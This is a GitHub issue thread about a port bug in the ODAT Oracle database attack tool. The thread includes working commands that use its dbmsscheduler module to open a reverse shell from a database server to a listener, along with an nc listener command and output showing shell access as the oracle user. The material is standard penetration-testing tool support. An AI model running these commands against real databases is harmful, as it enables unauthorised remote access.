Closed reversebrain closed 8 years ago
Yes. Very strange...
I have just tested the lastest development version and standalone version (v2.0) with the following command on a 12.1.0.2 database:
./odat.py dbmsscheduler -s 192.168.56.2 -d ORCL -U $user -P $password --reverse-shell 192.168.56.1 65534
I have the following output:
[1] (192.168.56.102:1521): Try to give you a reverse shell from the 192.168.56.2 server
[+] The python reverse shell tries to connect to 192.168.56.1:65534
Listening on [0.0.0.0] (family 0, port 65534)
Connection from [192.168.56.2] port 65534 [tcp/*] accepted (family 2, sport 29247)
sh: no job control in this shell
sh-4.2$ id
id
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Here is the netstat output:
netstat -antp | grep 65534
tcp 0 0 192.168.56.1:65534 192.168.56.2:29247 ESTABLISHED 3654/nc
For me, the reverse shell is established on the 65534 local port (2nd parameter of --reverse-shell). I can't reproduce your problem.
Thank you in advance,
I'm using the development version with Oracle Instant Client 11.1. This is my command:
sudo ./odat.py dbmsscheduler -s 127.0.0.1 -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 --reverse-shell 10.10.72.110 443
This is the output:
[1] (127.0.0.1:9000): Try to give you a reverse shell from the 127.0.0.1 server
[+] The python reverse shell tries to connect to 10.10.72.110:443
443: inverse host lookup failed: Unknown host
listening on [any] 56657 ...
[+] The Job is running
I can get the reverse shell only performing this:
sudo nc -lvp 443
In fact this is the output:
listening on [any] 443 ...
192.168.101.7: inverse host lookup failed: Unknown host
connect to [10.10.72.110] from (UNKNOWN) [192.168.101.7] 50991
sh: no job control in this shell
sh-4.1$
The following commit should fix this issue: 1fb920e0ad56a36f8d1ca40a642225a273779895 Can you confirm ?
Yes, I think that the problem is -p parameter which specify the port to use.
EDIT: Yes, now it works, I retried to perform the same commands and now it is listening on the correct port. Thank you
Your welcome. Thank you to you for this bug report.
First of all thank you for your tool! I noticed a strange problem executing a dmsscheduler module with reverse shell parameter. When odat start listen to a specified port, it doens't match the port written in input after the IP but a random one